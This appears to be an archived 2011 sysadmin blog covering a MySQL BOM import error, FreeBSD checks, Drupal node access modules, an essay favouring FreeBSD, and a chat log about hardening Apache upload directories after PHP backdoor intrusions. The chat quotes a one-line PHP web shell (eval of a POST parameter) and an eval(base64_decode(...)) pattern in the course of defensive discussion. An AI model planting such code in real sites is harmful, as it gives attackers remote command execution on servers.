Thursday, February 24, 2011

Got error message when trying to import restore mysqldump database file to database

ERROR 1064 (42000) at line 467: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1

As of MySQL 5.0.54, mysql ignores Unicode byte order mark (BOM) characters at the beginning of input files. Previously, it read them and sent them to the server, resulting in a syntax error. Presence of a BOM does not cause mysql to change its default character set. To do that, invoke mysql with an option such as --default-character-set=utf8.

# pkg_info | grep -i mysql
mysql-client-5.5.9 Multithreaded SQL database (client)
mysql-server-5.5.9 Multithreaded SQL database (server)

# mysql --default-character-set=utf8 -u user_name -p db_name < db_dumped.sql

To check if a file contains a UTF-8 BOM at the header
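As an added example (not from the original post), a PHP script that reads the first three bytes of a dump file, reports whether they are the UTF-8 BOM (EF BB BF), and writes a BOM-free copy that can then be fed to mysql; the file names are constructed for the demo.

```php
<?php
// Added example (not from the original post): detect a UTF-8 BOM at the start
// of a dump file and write a copy without it, so `mysql < dump.sql` never sends
// the three BOM bytes to the server as part of the first statement.

define('UTF8_BOM', "\xEF\xBB\xBF");

/**
 * Return TRUE when the first three bytes of $path are EF BB BF.
 */
function has_utf8_bom($path) {
  $fh = fopen($path, 'rb');
  if ($fh === FALSE) {
    throw new RuntimeException("cannot open $path");
  }
  $head = fread($fh, 3);   // a shorter file simply yields fewer bytes
  fclose($fh);
  return $head === UTF8_BOM;
}

/**
 * Copy $src to $dst, skipping the BOM if present. The file is streamed, so a
 * multi-gigabyte dump is never loaded into memory. Returns TRUE if a BOM was
 * removed, FALSE if the file was copied unchanged.
 */
function strip_utf8_bom($src, $dst) {
  $in  = fopen($src, 'rb');
  $out = fopen($dst, 'wb');
  if ($in === FALSE || $out === FALSE) {
    throw new RuntimeException("cannot open $src or $dst");
  }
  $head    = fread($in, 3);
  $had_bom = ($head === UTF8_BOM);
  if (!$had_bom) {
    fwrite($out, $head);              // not a BOM: keep the bytes already read
  }
  stream_copy_to_stream($in, $out);   // the rest of the file, unchanged
  fclose($in);
  fclose($out);
  return $had_bom;
}

// Demo on a constructed file: a one-statement dump with a BOM in front of it.
$tmp = tempnam(sys_get_temp_dir(), 'dump');
file_put_contents($tmp, UTF8_BOM . "CREATE TABLE t (id INT);\n");

var_dump(has_utf8_bom($tmp));
var_dump(strip_utf8_bom($tmp, $tmp . '.nobom'));
var_dump(has_utf8_bom($tmp . '.nobom'));
echo bin2hex(substr(file_get_contents($tmp), 0, 3)), PHP_EOL;

unlink($tmp);
unlink($tmp . '.nobom');
```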

Tuesday, February 22, 2011

How to tell whether a FreeBSD system is 64-bit or 32-bit

Method 1:
# uname -m
i386

Method 2:

# file /bin/ls
/bin/ls: ELF 32-bit LSB executable, Intel 80386

Method 3:
# sysctl -a|grep hw.machine
hw.machine = i386

Monday, February 21, 2011

Overview of Node Access modules

Drupal's API contains a pretty good description of how node access works (developers should also analyze the node_access function itself). There are many contributed node access control modules for Drupal and you really should understand the basics of node access before installing and configuring one. The API should suffice for developers but for the benefit of our many community members who build sites without reading code, here is a translation and some basic rules of thumb:

  • In general, you don't want to use more than one node access module on your site. There are many node access modules to choose from: taxonomy access, nodeaccess, simple access, workflow access, etc. We all tend to add lots of modules to our sites and to expect them to play well together, but node access is an area where we need to be extra thoughtful.
  • Users with permission to 'administer nodes' are never restricted by node access modules. Users who do not have permission to 'access content' will never gain access from a node access module. Only users who have 'access content' and not 'administer nodes' are eligible for the wild world of node access module control.
  • If a user's role has permission to create or edit a content type, or to edit their own posts in that content type, that ability will always be allowed regardless of your node access module's configuration. Delete access is included in the 'edit' permission. If you want to control creating, editing, or deleting of your nodes with a node access module, be sure to not give your users these permissions in the permissions table.
  • If your content type comes from an additional module (forum, event, etc.) other than cck, it may have its own permissions to set. Giving a role these permissions will also supersede the use of any node access module.
  • Node access modules always GRANT access and never restrict it. (It is a whitelisting rather than a blacklisting system.) If you use two node access modules and one grants access while another does not, access is granted. One exception is the Module Grants module, through which it is possible to combine access grants across multiple modules in a more intuitive way. Without it the displayed behaviour may appear backwards from what most people would assume, and it's the reason why it is tricky to get involved with multiple node access modules. It is possible, however, to use multiple node access modules in harmony if, for example, they are applied to different content types or are giving out different grant types.
  • The four types of possible grants on a node are: view, update, create, and delete. You can use Devel module's devel_node_access to analyze a node's node access grants. (Doing so as a non-developer is a good sign that you've gotten into trouble with your node access modules and may need to follow the above advice!)
  • The node access table in the database can become confused if you have, for example, toyed with multiple node access modules or come into contact with a deranged one. If you have been involved with risky node access behaviors you should rebuild your permissions. You can find this option at admin/content/node-settings which is the 'Post Settings' configuration screen. It is rarely necessary.
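To make the grant-only behaviour concrete, here is an added example (not Drupal's own code and not from the original page): a simplified PHP model of the decision order the bullets describe, with constructed realm names, grant ids and users. It leaves out the content-type edit/create permission short-circuit from the third bullet and models only the admin bypass, the 'access content' requirement and the OR across grants.

```php
<?php
// Added example: a simplified model of the node access rules listed above.
// It is NOT Drupal's node_access(); realm names, grant ids and users below are
// constructed for the demo. Records mimic what hook_node_access_records()
// stores in {node_access}: one row per (realm, gid) with grant_* bits.

/**
 * Decide whether $user may perform $op ('view', 'update' or 'delete') on a
 * node whose access records are $records.
 */
function node_access_decision($op, array $user, array $records) {
  // Rule 1: 'administer nodes' is never restricted by node access modules.
  if (in_array('administer nodes', $user['permissions'], TRUE)) {
    return TRUE;
  }
  // Rule 2: without 'access content' no module can grant anything.
  if (!in_array('access content', $user['permissions'], TRUE)) {
    return FALSE;
  }
  // Rule 3: grants only ever ADD access. One record from ANY module whose
  // (realm, gid) the user holds and whose grant_<op> bit is set is enough;
  // a record with the bit cleared does not take access away.
  foreach ($records as $record) {
    $realm     = $record['realm'];
    $user_gids = isset($user['grants'][$realm]) ? $user['grants'][$realm] : array();
    if (in_array($record['gid'], $user_gids, TRUE) && !empty($record['grant_' . $op])) {
      return TRUE;
    }
  }
  return FALSE;
}

// Constructed records for one node, written by two different modules: a
// role-based module lets role id 2 view; a user-based module lists user 7 but
// gives that user no grants at all.
$records = array(
  array('realm' => 'demo_role', 'gid' => 2, 'grant_view' => 1, 'grant_update' => 0, 'grant_delete' => 0),
  array('realm' => 'demo_user', 'gid' => 7, 'grant_view' => 0, 'grant_update' => 0, 'grant_delete' => 0),
);

// Constructed users. 'grants' mimics the (realm => gids) map that
// hook_node_grants() returns for the current user.
$editor  = array('permissions' => array('access content'),
                 'grants' => array('demo_role' => array(2), 'demo_user' => array(7)));
$visitor = array('permissions' => array('access content'),
                 'grants' => array('demo_role' => array(1)));
$admin   = array('permissions' => array('administer nodes'), 'grants' => array());
$nobody  = array('permissions' => array(),
                 'grants' => array('demo_role' => array(2)));

$cases = array(
  'editor view   (role module grants, user module does not: still allowed)' => node_access_decision('view', $editor, $records),
  'editor update (no module grants update)'                                 => node_access_decision('update', $editor, $records),
  'visitor view  (no matching grant)'                                       => node_access_decision('view', $visitor, $records),
  'admin delete  (administer nodes bypasses everything)'                    => node_access_decision('delete', $admin, $records),
  'nobody view   (no access content, so the grant is ignored)'              => node_access_decision('view', $nobody, $records),
);
foreach ($cases as $label => $allowed) {
  printf("%-74s %s\n", $label, $allowed ? 'ALLOWED' : 'denied');
}
```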

Access modules

Security Modules lists some access modules and http://drupal.org/taxonomy/term/69 lists every module with the security tag.

Generic modules

Nodeaccess

Users with the 'grant node permissions' permission will have a grant tab on node pages which allows them to grant access to that node by user or role. Administrators can set default access controls per content type, and also define which roles are available to grant permissions to on the node grants tab.

Access control list modules

The ACL module, short for Access Control List, is an API for other modules to create lists of users and give them access to nodes. It has no UI of its own and will not do anything by itself; install this module only if some other module tells you to.

Content access

This module allows you to manage permissions for content types by role and author. It allows you to specify custom view, edit and delete permissions for each content type. Optionally you can enable per-content access settings, so you can customize the access for each content node.

Forum access

This module changes your forum administration page to allow you to set forums private. You can control what user roles can view, edit, delete, and post to each forum. You can also give each forum a list of users who have administrative access on that forum (AKA moderators).

Image gallery access

This module changes your image gallery administration page to allow you to set image galleries private. You can control what user roles can view, edit, delete and post to each gallery. You can also give each gallery a list of users who have administrative access on that gallery (AKA moderators).

CCK field based modules

Nodeaccess userreference

Allows you to configure a CCK user reference field so that the user who is referenced in a node is granted access to view the node. There are also options to give the user access to edit or delete the node.

Nodeaccess Nodereference

Gives access to users if they have access to a referenced node. Checks view, update, and delete grants.

Node access auto reference

Gives automatic access to users if they are referenced in some way from this node.

It scans for references automatically to unlimited depth, so you no longer need to worry about configuring your permissions correctly, because it checks for references on its own.

Taxonomy based

Use these modules to control access based on those tags, vocabularies, and terms you already use, if you use them. Classification, taxonomy and tagging modules lists modules to help you classify and tag content.

Taxonomy Access Control

Access control for user roles based on taxonomy categories (vocabulary, terms).

Connect roles to terms. Useful if everyone has the right role. A good way to control a lot of people when they slot easily into a few roles.

Taxonomy Access Control Lite

This module restricts access so that some users may view content that is hidden from others. A simple scheme based on taxonomy, roles and users controls which content is hidden.

Take the Taxonomy Access Control role based access and add user based controls. Lets you assign users to roles and give the roles access to nodes by term but then lets you give special access to those annoying management types who refuse to wait while you create a new role. Also gives you a quick way to let contractors and temps grab quick access to resources. You know the situation. Hey it is seven minutes before your contract runs out. Rearrange the CRM system to include images the same as Facebook. I will give you access to the 398 nodes you have to change. Fix all the spelling mistakes while you are at it.

Taxonomy access user

Taxonomy access with inheritance.

Modules that contain node access modules

Workflow

The workflow module allows the creation and assignment of arbitrary workflows to Drupal node types. Workflows are made up of workflow states. For example, a workflow with the states Draft, Review, and Published could be assigned to the Story node type.

Organic Groups

Enable users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves.

Domain

The Domain Access project is a suite of modules that provide tools for running a group of affiliated sites from one Drupal installation and a single shared database. The module allows you to share users, content, and configurations across a group of sites such as:

Modules for use by other modules

Relativity access

This module enables access control based on (and so requires) the Node Relativity module. It propagates the grants from a node to its descendants. You should use another module like nodeaccess to provide the grant to the ancestors.

Ubercart node access

UC Node Access lets you attach Node access features to products in your Ubercart store. These features allow customers who purchase the product to receive view access to nodes on your site either indefinitely or for a limited time based on the feature's settings. UC Node Access does not handle access grants itself but rather depends on other modules to define handlers that integrate UC Node Access with the various node access modules developed for Drupal.

User points node access

The Drupal userpoints nodeaccess module enables you to sell access to a single node for a specific category and amount of userpoints.

Ecommerce Node Access Product

Provides 'Node Access' settings for product nodes, whereby users who purchase the product are granted view access to content, which can be predefined either by category, by node, or by view.

Modules that alter the menu to allow access to give edit access

These modules bypass the node access system and instead alter access of node/%/view, node/%/edit and node/%/delete, so may have issues scaling.

Node access

Sunday, February 20, 2011

Why FreeBSD?

Choosing an Operating System


Mac OS X has some clear advantages as a personal workstation,
especially for non computer gurus. It runs MRI tools side-by-side with
commercial publication software such as Adobe, Corel Draw, and MS
Office. The Mac is also by far the easiest system for "normal" people
to manage.

FreeBSD (as well as its
derivatives)
also has some clear advantages over OS X, which may not
be apparent to the average user, so I will discuss some of them below.


One problem with the Mac in a networked computer lab is that some fMRI applications (e.g. Caret, fslview) are Aqua applications on the Mac, and hence can't be used effectively from a remote display. Aqua is Apple's proprietary GUI, which is used for most Mac applications, and works only on the console.


On FreeBSD, Linux, and other "pure" Unix systems, virtually all
graphical applications use the X11 networked graphics API, which means
they run the same on a remote display as they would on the console
(perhaps somewhat slower due to network bottlenecks, although this
usually isn't a problem.)


In case you were wondering, no, Apple Remote Desktop (ARD) and VNC
won't help with running Aqua applications remotely. There are two reasons:


  1. They take over the console desktop, rather than allow additional
    login sessions on a separate display, as X11 does.
  2. The graphics are terribly slow. ARD and VNC are designed primarily
    as administration tools, and as a way to access your desktop remotely
    on occasion, whereas X11 was designed to handle intensive day-to-day
    graphics work over a (reasonably fast) network.

FreeBSD as a Server and Desktop

FreeBSD, in my experience, has no peer as a server operating system, and makes a pretty good desktop system for most purposes.
The one weak spot I've run into is dealing with multimedia on the WEB. Browser plugins such as RealPlayer and Flash Player need frequent updates, and FreeBSD does not yet have a system in place for installing and updating them easily. For closed-source commercial plugins, FreeBSD must rely on the Linux binaries, and there is sometimes an additional lag between their release for Linux, and their usability on FreeBSD. All in all, though, FreeBSD runs pretty much the same software as Linux. Virtually any open source program that runs on Linux is also available for FreeBSD, and FreeBSD will run most closed source Linux programs as well.

Multitasking

FreeBSD's multitasking is far smoother than in any other OS I've used (and I've used a lot of them). It takes a remarkably heavy load to cause any noticeable degradation in response times. I routinely run computationally intensive programs in the background without suffering any discomfort with my desktop applications such as OpenOffice.org, Firefox, Thunderbird, etc. In most other operating systems, including OS X, desktop applications become choppy and sluggish when other CPU and memory intensive jobs are running. Running background jobs under 'nice' (to lower their CPU priority) can make a huge difference on most other platforms, but it's impossible to get every other user to use it consistently. On FreeBSD, the CPU scheduling is so good that the impact of 'nice' isn't very noticeable, but it's still a good habit to use it.

High Performance Filesystem

FreeBSD uses UFS2, a non-journalling, very fast, very reliable filesystem. Journalling filesystems, in my opinion, are overrated and more of a security blanket than a real benefit. This is not to say that journalling filesystems are "bad"; only that there are other ways to accomplish the same benefits of a journal. I'm thankful that FreeBSD has avoided following the crowd of operating systems adopting journalling filesystems. This demonstrates a commitment to facts and reason above marketing concerns.
For readers unfamiliar with this subject, the journal is a dedicated area of disk used to "buffer" write operations, instead of using RAM for this purpose. This means that write operations are immediately stored on disk, and in the event of a system crash, the journal can be replayed to quickly restore the integrity of the filesystem. Although journals are very effective in restoring filesystem integrity, many people don't realize that they aren't the only solution. The disadvantage of journalling, of course, is that disk is much slower than RAM, and writing data (or meta-data) to the journal and then again to the final location in the filesystem increases the disk head movements necessary to complete a write operation to a file.
UFS2 uses an alternative strategy, known as soft-updates. Soft-updates solve the problems that would make it difficult to repair a filesystem, without sacrificing the performance benefits of memory buffers. There are many articles about the details of soft-updates available on the WEB, so I won't get into details here. For a brief explanation, see the Wikipedia article.
Linux users who have worked with EXT2 often assume that FreeBSD's UFS2 will suffer the same painfully slow filesystem checks, because it doesn't use a journal. However, in the many years since soft-updates were introduced to FreeBSD, I've never seen a filesystem check take more than a few minutes, even on my largest RAID arrays, and I've never suffered a significant loss of data, even in the case of a sudden power outage.
Another common misconception is that journals greatly reduce data loss in the event of a crash. In reality, however, memory-buffers are synchronized to disk about every 30 seconds on a typical Unix system, so at most a fully journalled filesystem will save an additional 30 seconds worth of work. The real benefit and goal of journals is to alleviate the painfully slow (often over an hour long) filesystem checks/repairs that were common to older memory-buffered filesystems, such as EXT2. On that note, I would never advise Linux users to go back to EXT2. Of the filesystems available on Linux, those using journals are clearly the best. My personal recommendation is reiserfs, which in my experience, outperforms EXT3 by a wide margin. Of course, results may vary for a particular application, so if filesystem performance is a major concern, you should do your own benchmarking before you decide.

Ports and Packages

Another important feature of FreeBSD is the ports system, which makes it trivial to download and install (without searching the Internet) virtually all of the popular open source software, and some closed-source programs as well. With the ports/packages system, there is no need to search the WEB for software, and then figure out how to compile it on your system. Currently over 16,000 popular software programs can be found in the ports system, easily searched or browsed on the FreeBSD WEB site, and downloaded and installed with a single command. I've ported many MRI tools to FreeBSD to make them easier for myself and others to install. These ports can be found here.

Stability

I would argue that stability is the most important measure of a system with regard to minimizing computing costs. Talented systems administrators are very hard to come by, and consequently, their time is very expensive. Every system malfunction means time and money down the drain. The more stable your systems are, the more systems can be managed in a given number of admin-hours.
Obviously, system stability also affects the productivity of the users. The major goal in designing a computing system should always be to minimize work interruptions. This means minimizing system outages and malfunctions, as well as minimizing the impact of a system outage. Running FreeBSD will take care of the former. The latter is best served by distributing load as much as possible, rather than centralizing it. E.g., distribute server responsibilities among several systems, so that if one goes down, users will still be able to access the functionality of those that remain.
FreeBSD is by far the most stable operating system I've ever worked with. (And I've worked with a lot of them.) Most of my FreeBSD systems run uninterrupted between hardware failures and power outages. It's common to see FreeBSD machines that have been running well over a year without a reboot, and most outages are due to hardware or power failures.
Moreover, FreeBSD tends to dominate the longest uptime category in Netcraft's WEB surveys.
For current stats:
Most reliable sites
Longest uptimes
FreeBSD has also been the OS of choice of many popular WEB servers, such as yahoo.com, cdrom.com, and hotmail.com. For a history of the OS, see the Wikipedia article.

Support

One of the most common concerns of many would-be FreeBSD users is support. People often assume that since they haven't heard more about the product, it must not be widely used. Not to worry - the FreeBSD community is HUGE, and quite helpful. People often state that Linux is more popular than FreeBSD. While this is almost certainly true, it is not a valid comparison. FreeBSD is a complete system, more akin to a Linux distribution than to Linux in general, and probably has a larger user base than all but the top few Linux distributions. The term "Linux" refers only to the Linux kernel project, around which the many different Linux distributions are built. When it comes to user support, users of the same distribution can be much more helpful than someone just using the same kernel. I.e., RedHat users, despite their best intentions, are somewhat limited in their ability to help you with many questions about your Gentoo or Debian system.
The bottom line is, with FreeBSD, there will be a lot of people using the same complete system as you. Hardware support is very strong, problems are few, and solutions tend to be well publicized. Some companies also offer paid support services for FreeBSD.

FreeBSD and Windows Applications

If you need to run Windows applications as well, I recommend Win4BSD, the latest port of a virtualization system also known as SCO Merge and Win4Lin. Win4BSD is a solid commercial product at a very reasonable price. It's extremely simple to install and use, and runs Windows applications at nearly native speed. If you find this, or any other commercial product useful, please do buy a copy, to encourage future development of commercial applications for FreeBSD and Linux.

Win4BSD 1.1 running Windows XP on a FreeBSD 5.4 desktop

Win4{BSD,Lin} is comparable to Parallels for the Intel Mac, (another solid product) in that it allows you to boot Windows 2000 or XP as a "guest" operating system, which will run at nearly native speed within your FreeBSD host. Setup is a snap, and your virtual Windows system will be ready to use and fully integrated with the host the moment you finish installing Windows. Win4BSD leverages code from the QEMU project, but is much faster and easier to use than the qemu port. It's well worth the modest purchase price.
One advantage of Win4{BSD,Lin} over Parallels on the Mac is that a Windows session can be run from a remote X11 display (e.g. another FreeBSD system, a Linux system, or even a Mac). The GUI may be a bit sluggish over a network, but if the network is 100baseT or more, it's fast enough that it won't delay your work.
Parallels, on the other hand, is an Aqua application, so it can only be run on the Mac console. The GUI is visibly faster than Win4BSD, since Aqua always uses direct hardware rendering vs. X11's client/server model. However, I would consider this more of a cosmetic difference than a functional one. The Win4BSD graphics are fast enough, especially on the console of a modern FreeBSD machine. In theory, you could run Parallels remotely through VNC or Apple Remote Desktop, but performance of these systems is much slower than X11. Windows is unusably slow even over a 100 megabit network with VNC. Another disadvantage of VNC and ARD is that they take over the console rather than allow a separate login session as X11 does. Hence, no one can use the Mac console while you're remotely logged in over VNC or ARD.
If you want to be able to run Windows from a remote display, you'll want to get a FreeBSD or Linux system and run Win4{BSD,Lin}.
Note also that Mac OS X and Parallels are rather memory hungry compared to FreeBSD and Win4BSD, so you'll need to spend more on RAM for your Mac in order to run a Windows guest comfortably. A Mac with 512 megabytes just won't cut it for Parallels, while a FreeBSD box with 512 megabytes does just fine with Win4BSD.





Quick Comparison

                                    Win4BSD                                    Parallels Desktop for Mac
Min requirements, Windows XP guest  1.4GHz Athlon/Pentium, 512 megabytes RAM   Intel Mac, 1 gig RAM
CPU speed                           Near native                                Near native
GUI responsiveness                  Adequate                                   Good
Run from a remote display           Yes                                        No
Ease of setup                       Very easy                                  Very easy

Running Windows applications under a guest operating system
isn't quite as elegant as running OS X
native MS Office, Adobe, etc., but the Win4BSD system integrates very
well with the FreeBSD host.


Other alternatives for emulation and/or virtualization include
VMware, QEMU, and WINE. None of these are as easy to use or efficient
as Win4BSD, however.


WINE also operates quite differently. While the others emulate (or
virtualize) PC hardware, WINE attempts to emulate the Windows API
(applications program interface), allowing Windows programs to run
directly under Unix. This is a much more ambitious task than just
emulating hardware, given that much of the complexity of the Windows
OS must be duplicated. Not to mention that the API is constantly
changing. The advantage is that no Windows OS needs to be purchased
or running in order to run Windows applications. They simply run on
the same Unix desktop as other applications.

Despite the difficulty of the task, the WINE project has made significant progress, and some
major Windows applications can now be run under Linux, FreeBSD, and
other Intel based operating systems.

Reference:
http://www.neuro.mcw.edu/Ports/FreeBSD/why_freebsd.html

Wednesday, February 16, 2011

Setting up a Nagios network monitoring host

http://phorum.study-area.org/index.php?topic=62156.0

Top 100 Network Security Tools
http://sectools.org/index.html

I'd like to switch to icinga, a prettified version based on Nagios.. but on FreeBSD this one has to be installed by hand~ it's not in the ports tree
http://www.icinga.org/
==========================================

STAR says:
123

DANNY says:
456

STAR says:
Ha~ you're here~
Not busy anymore?

DANNY says:
Not that busy, heh, what are you up to

STAR says:
Just recommended EditPlus3 to 璉璉

DANNY says:
What was she using before

STAR says:
UltraEdit

DANNY says:
Oh! A few days ago I wanted to use the find command to find files modified in the last few days

I used

# find /www/ -mtime 3

Turns out that's not how it works!

To find files modified within the last three days, you need

find /www/ -mtime -3

(an extra - in front of the 3)

And this doesn't work either:

# find /www

It has to be:

# find /www/

(with a trailing slash)

STAR says:
Ohh@@!

DANNY says:
Noting this down as a reminder

-3 // within three days
+3 // more than three days
3 // modified exactly "three days ago" (not one day ago, not two days ago)

And you can add seconds, minutes, hours, days, weeks

For example

-3d (within three days,, the default is day anyway)

STAR says:
正港, are you using any software to monitor host status?

DANNY says:
None at all right now (that's my next step)

STAR says:
Nagios <-- I happen to be setting this up these past couple of days

DANNY says:
The reason I'm nervous is that last week the whole of /www got stuffed with backdoors

STAR says:
http://phorum.study-area.org/index.php?topic=62156.0
Ohh? A cmd backdoor got dropped in?

<璉--------------------------------璉> says:
Isn't Nagios the thing MAX went to Taichung to give a talk on!

STAR says:
YES
Talked about it at the Taichung session on the 21st

DANNY says:
By the end of this month I have to get the website development finished first, then put my main effort into host administration

I'm going to set all directories under /www to root (only root can modify files; then use svn update to refresh the source code periodically)

STAR says:
Your backdoor was probably dropped in through apache via PHP's file upload feature, right?
And the folder the uploaded files land in also allows executables to run

DANNY says:
Not sure, still haven't found it

Right now, say, /www/upload (the upload directory)

Visiting http://domain/upload/test.php directly does not get executed

STAR says:
小築's host also had a backdoor dropped on it; the file was XXX.php and its contents were just
<?php eval($_POST[cmd]);?>

DANNY says:
The one I ran into looked like this
http://gala4th.blogspot.com/2010/08/some-drupal-scripts-got-affected-today.html
and then base64 encoded

eval(base64_decode('DQogIEBz........'))

STAR says:
Yeah! Had that too
the same thing

DANNY says:
Monitoring closely by hand every day, ha, but that's no long-term solution
The one I ran into was a pretty complete control panel

STAR says:
PhpSpy 2008
This one?
It's almost always this one

DANNY says:
Top 100 Network Security Tools
http://sectools.org/index.html

(Nagios is in there too)

STAR says:
I went straight at it from the apache configuration

DANNY says:
Is there a document to refer to?
I'm using drupal; the file upload directory has a .htaccess, and that is configured too

STAR says:
Set the upload directory directly
<Directory "/www/html/updata">
php_admin_flag engine off
Options -ExecCGI
AddType text/plain .html .htm .shtml .php
</Directory>

Prevents .html .htm .shtml .php in the public upload directory from being executable
What does the .htaccess set?

DANNY says:
Why block .html too?

STAR says:
I block html htm shtml, all of them
To stop malicious html or javascript being dropped into your updata directory
Even if they get dropped in, those files are completely ineffective

DANNY says:
# cat .htaccess
SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006
Options None
Options +FollowSymLinks

STAR says:
Setting just that doesn't do anything, does it?

DANNY says:
drupal has a dedicated security team keeping an eye on this area XD

STAR says:
Executable files will still run

DANNY says:
<Directory "/home/www">
### Turn off php
php_admin_flag engine off

Options -ExecCGI

#AddType text/plain .html .htm .shtml .php

#Options Indexes FollowSymLinks

#Options +Indexes FollowSymLinks +ExecCGI
#AllowOverride AuthConfig FileInfo

#
# Controls who can get stuff from this server.
#
Order allow,deny
Allow from all
</Directory>

Haven't had time to study this area yet, heh

STAR says:
With my settings, anything under /www/html/updata just gets shown as plain-text source
Last time a backdoor was dropped on me it also took over a month to find the problem

DANNY says:
I'll take notes first; I take notes diligently and put them all on the blog, ha

STAR says:
I even wrote something that scans the code under the web directory on a schedule to see whether anything has been injected
As soon as something is injected it notifies me via MSN right away~~

DANNY says:
I'm still not clear what this line

SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006

is for (I'm guessing there may be more detailed settings somewhere else)

STAR says:
In the end, only after making the upload directory unable to execute any html htm shtm php did the backdoor drops and database tampering stop
Judging by the text it looks like just a comment/hint@@!

DANNY says:
Have you set all of /www/* to

# chown -R root:www

# chmod -R 640

? (I plan to do it that way)

STAR says:
That time it was actually site A attacking site B.. which had me searching site B for ages without finding any abnormal code
And each of my VirtualHosts has its own log per site
So I kept digging through the logs of site B, the one being attacked, and couldn't find any abnormal entries
But the database really was getting iframes injected the whole time

STAR says:
In the end I scanned the code of every site on that same machine and found the backdoor on site A~XD
So directories that allow file uploads from the web are the most dangerous

DANNY says:
There has to be a trailing slash after /www!!! (if that directory is a symbolic link!!)

# find /www/ -type d -exec chown root:www {} \;
# find /www/ -type f -exec chown root:www {} \;

# find /www/ -type d -exec chmod 760 {} \;
# find /www/ -type f -exec chmod 640 {} \;

STAR says:
I've tried your approach too@@!
It only stops people from changing your code through apache

DANNY says:
This is very tricky; if you run the command like this:

# find /www -type f

it finds nothing at all! Remember to use:

# find /www/ -type f

(because my /www maps to /usr/local/www/apache22/data and is a symbolic link, there has to be a trailing slash; it cost me ages of debugging before)

STAR says:
But it can't stop the backdoors people drop in
their backdoor can still run

DANNY says:
It can! When combined with svn update

STAR says:
That much hassle@@?

DANNY says:
Run svn up in crontab
Not at all, the production host's /www is just another "SVN client"

STAR says:
As I said above~ make every file in the upload directory ineffective; so far nothing has gone wrong

DANNY says:
Then all developers just develop on their own local machines

When done, svn commit up to the svn server

STAR says:
If they have what it takes to drop a backdoor, let them
their backdoor is useless anyway
Server maintenance then becomes a matter of taking an MIS viewpoint

DANNY says:
That is, all the developers and the production host are SVN clients

(Because we have time differences with North America and China, it's set to check automatically every 5 minutes, but this approach is quite convenient too; once development is finished you stop svn update, since the site is often adding features while already live)

STAR says:
Rather than hunting for holes, make it so that having holes doesn't matter

DANNY says:
I'll do both! Directory permissions also need to be set as absolutely strict as possible, this is so annoying

STAR says:
Adding features and fixing bugs while the site is live is perfectly normal
Some holes may not be in the code but in php or apache

DANNY says:
But always having to go to the host to svn update wastes too much time, and besides, in a directory under svn control, running:

svn st

tells you which files have been changed!

In principle, the files on the production host are never modified directly on the host; if they have been modified, you can immediately conclude someone has tampered with them and there's a hole!

(Changes are only ever made on the developers' local machines, then committed)

STAR says:
But if you do it that way and they tamper with your .svn directory as well, svn st becomes useless

DANNY says:
Right now I have

/www

and the upload directory completely separated under different paths

The "source code" lives in

/usr/local/www/apache22/data (symbolic link /www )

Uploaded files live in

/usr/local/www/upload_files

That way /www can keep all the source code entirely under svn control

So the svn command:

svn status

has value as a monitoring reference (combined with other things, of course)

That's why I want to set everything under /www to root ownership, so only root can modify it

That way, even if they try to do things through www, they won't be able to modify files for lack of permission

And the svn up in crontab is run as root

I'm laying out my approach/thinking here to exchange ideas and see whether there's anything I haven't considered; challenges welcome, heh

STAR says:
Where your backdoor got dropped in from is the key point

DANNY says:
To sum up a few key points

[] Set file and directory permissions strictly, without getting in the way of development (other people modifying files)

[] Make uploaded files completely ineffective

[] Monitor modified files, including modification dates and whether the modified contents contain dirty code; mail immediately if there's a problem

[] Anything to add?

STAR says:
With permissions locked down, of course they can't change your existing files
But if they can still create new files, that may be the problem

DANNY says:
It could be that the code itself has a problem (not necessarily the upload area), or that system commands can be run directly to create an executable

So it's best to lock down "directory" permissions as well

STAR says:
Some know you've locked down file permissions but can still get you to host malicious programs
Then they use your site as a springboard for spreading malware
rather than attacking your site directly

DANNY says:
Not even new files can be added; then carefully arrange the "directories that need to be modified" (e.g. uploads, or some dynamic image data that gets refreshed periodically)

STAR says:
If your Domain Name is detected spreading malware, big players like Google will flag it as a dangerous site

DANNY says:
Right, I've had that! Several html files were stuffed in, redirecting to some site
So all you can do is block on every front as much as possible; there are too many possibilities :P

STAR says:
That's why above I set html htm shtm as non-executable too@@
Though now I think I also missed .js and .css

DANNY says:
Yeah, I think this exchange of ours is great! Really satisfying, heh
<璉--------------------------------璉> says:
Good night everyone~

STAR says:
Good night 璉璉~~
Off to bed~

DANNY says:
A bit of brainstorming

STAR says:
Nowadays .js and .css can also have malicious code injected

DANNY says:
My current habit is to never modify any code directly on the host; everything goes through svn

STAR says:
Oh@@!
Even more impressive is embedding malicious code in image files..
That has to be filtered by some apache modules that guard against malicious image files!

STAR says:
Today at OSDC a Japanese speaker did a live demo of embedding malicious code in image files

STAR says:
That session was wild; nearly every programming language could execute it

DANNY (tu) 正港.沉 - 忍者無敵 says:


STAR says:
Embedding malicious code in images

A PDF document I googled

Building a Secure Web Server Based on Apache+PHP+MySQL)
http://210.240.6.7/v7/edudata/file_down/497/20090818-130229__WebServer.pdf

STAR says:
I have the mod_security2 mentioned in this PDF installed!

STAR says:
http://osdc.tw/2010/02/schedule_polyglot_programming.html

STAR says:
Someone's notes mention mod_imagefight, which prevents image-embedding attacks
http://infuture.pixnet.net/blog/post/25250802

STAR says:
This seems to be that Japanese speaker's slides
http://wafful.org/mod_imagefight/ImageFight-LL2007.ppt

Polyglot Programming counts as a fairly advanced technique!! If you run into this it could be hard to defend against

How would you even know an image file has malicious code embedded in it!

Replace img tag src relative paths with absolute paths while leaving existing absolute paths unchanged.

<?php
$STR = <<<EOD
<html>
<body>
<img src='/sites/default/files/my_web/1.gif' width='6' height='6'>
<img src='/sites/default/files/my_web/2.gif' width='6' height='6'>
<img src='sites/default/files/my_web/3.gif' width='6' height='6'>
<img src='sites/default/files/my_web/4.gif' width='6' height='6'>
<img width='6' height='6' src='/sites/default/files/my_web/5.gif'>
<img width='6' height='6' src='sites/default/files/my_web/6.gif'>
<br>
<img src="/sites/default/files/my_web/7.gif" width="6" height="6">
<img src="/sites/default/files/my_web/8.gif" width="6" height="6">
<img src="sites/default/files/my_web/9.gif" width="6" height="6">
<img src="sites/default/files/my_web/10.gif" width="6" height="6">
<img width="6" height="6" src="/sites/default/files/my_web/11.gif">
<img width="6" height="6" src="sites/default/files/my_web/12.gif">

<img src="http://google.com/sites/default/files/my_web/13.gif" width="6" height="6">

